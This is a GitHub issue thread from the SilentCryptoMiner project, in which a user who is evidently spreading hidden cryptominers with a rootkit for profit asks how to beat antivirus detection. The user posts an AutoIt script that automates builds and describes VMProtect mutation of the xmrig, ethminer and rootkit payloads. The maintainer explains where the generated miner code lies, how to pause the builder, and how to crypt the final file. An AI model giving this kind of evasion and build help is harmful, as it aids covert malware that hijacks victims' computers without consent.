### ISSUE TITLE
Automatic crypt of resources

### ISSUE THREAD

**Issue by anbu-squad** [UnamSanctam/SilentCryptoMiner#1638]
I'm here about the question of how to make sure that the resources necessary for the miner to work, after assembling the builder, are in a separate folder

for each miner download option, I do a separate protection each time, in order to achieve uniqueness

however, only 10-15% of my installs can be considered successful

in general, it is necessary to constantly do automatic crypt

crypt resources ===> assemble build ===> crypt build

a lot of people use the miner
everyone is the same
very difficult to get a share of the profit

need a console command to build the build
and in addition to two miners and a rootkit
what libraries need to be protected or code?

**Comment by anbu-squad** [comment]
I found a way to compile the builder, where the resources are side by side in a folder
- rootkit
- xmrig
-etheminer

![888](https://github.com/UnamSanctam/SilentCryptoMiner/assets/88142198/44c02314-9493-4fa3-9f1a-05338d5bb3e3)

also added a build button to the tabmain for a script written in autoit

`#include <Misc.au3>
#include <File.au3>
#include <WinAPIShellEx.au3>
#include <Array.au3>
#include <GuiMenu.au3>
Local $pathXm
$pathXml = @ScriptDir
If ProcessExists("Silent Crypto Miner Builder.exe") = 0 Then
Run("Silent Crypto Miner Builder.exe")
WinWaitActive("Silent Crypto Miner Builder")
Sleep(2000)
ControlClick("[TITLE:Silent Crypto Miner Builder]", "", "[CLASSNN:WindowsForms10.Window.8.app.0.141b42a_r10_ad14]")
Sleep(2000)
WinActivate("[CLASS:#32770]", "")
WinWaitActive("[CLASS:#32770]", "")
Sleep(2000)
$FileList = _FileListToArray($pathXml, "*.xml", 1)
ControlSetText("", "", "[CLASS:Edit; INSTANCE:1]", $FileList[1])
Send("{ENTER}")
Sleep(2000)
ControlClick ("[CLASS:#32770]", "", "[CLASSNN:Button1]" )
Sleep(2000)
ControlClick("[TITLE:Silent Crypto Miner Builder]", "", "[CLASSNN:WindowsForms10.Window.8.app.0.141b42a_r10_ad13]")
Sleep(2000)
ControlSetText("", "", "[CLASS:Edit; INSTANCE:1]", "java")
Send("{ENTER}")
ProcessWaitClose ("cc1plus.exe")
Else
ControlClick("[TITLE:Silent Crypto Miner Builder]", "", "[CLASSNN:WindowsForms10.Window.8.app.0.141b42a_r10_ad13]")
Sleep(2000)
ControlSetText("", "", "[CLASS:Edit; INSTANCE:1]", "build")
Send("{ENTER}")
ProcessWaitClose ("cc1plus.exe")
EndIf
`

**Comment by anbu-squad** [comment]
I have a question, is it possible to randomize miner filenames?

**Comment by UnamSanctam** [comment]
Sorry I missed your first posts notification. You can randomize the miner filenames though what purpose would that serve? 

And does your miner work after crypting the resources (though they technically aren't resources really since the miner is made in C++)? Since usually crypters aren't made to be able to do that (unless they maybe clone the PEB I guess).

**Comment by anbu-squad** [comment]
I just thought that antiviruses see the names of miners in build, I don’t know exactly how it really works, these are just my ideas

I used the mutation of VMProtect for files:

    rootkit
    xmrig
    etheminer

And got a pretty good result
Also, after compilation, the miner build works fine


the essence of the strategy of counteracting constant detection
This is a cyclic update of options for the build itself

I saw a similar technique on the forums and came to the conclusion, based on my experience that this is the best option


after mutation, miner files and rootkit have only 2-4 detections each
however, the build itself after compilation has 10 detections, regardless of the use of the protector, and now I wanted to ask which code fragments need to be protected yet?

**Comment by UnamSanctam** [comment]
It shouldn't know the names because how they're included into the miner is by first reading the files bytes, then encrypting all the data and then embedding it into a byte array inside the miner.

Alright yeah if you're using VMProtect to do it then that should probably work since it's not really a "normal" crypter. If you want to crypt the final file in any way then you can do so as well if you're able to. If you want to see or change the final code itself then you can find all the finished code in the [MINERNAME].cpp file and inside the `UFiles` folder during the build. To pause the builder so that you can see it before it gets cleaned up then you can add a pause on the line after this one (easiest with a MessageBox so that it will stay paused until you close the message box):
https://github.com/UnamSanctam/SilentCryptoMiner/blob/8caef3eec1040ddb982574ccd7cc3d88016f7c09/SilentCryptoMiner/Classes/Codedom.cs#L75

The original miner code before it gets changed by the builder can be found here: https://github.com/UnamSanctam/SilentCryptoMiner/tree/master/SilentCryptoMiner/Resources/Code (except the SysWhisper code since it needs to use a special builder).

**Comment by anbu-squad** [comment]
Thank you very much
it already gives me an understanding of how to proceed
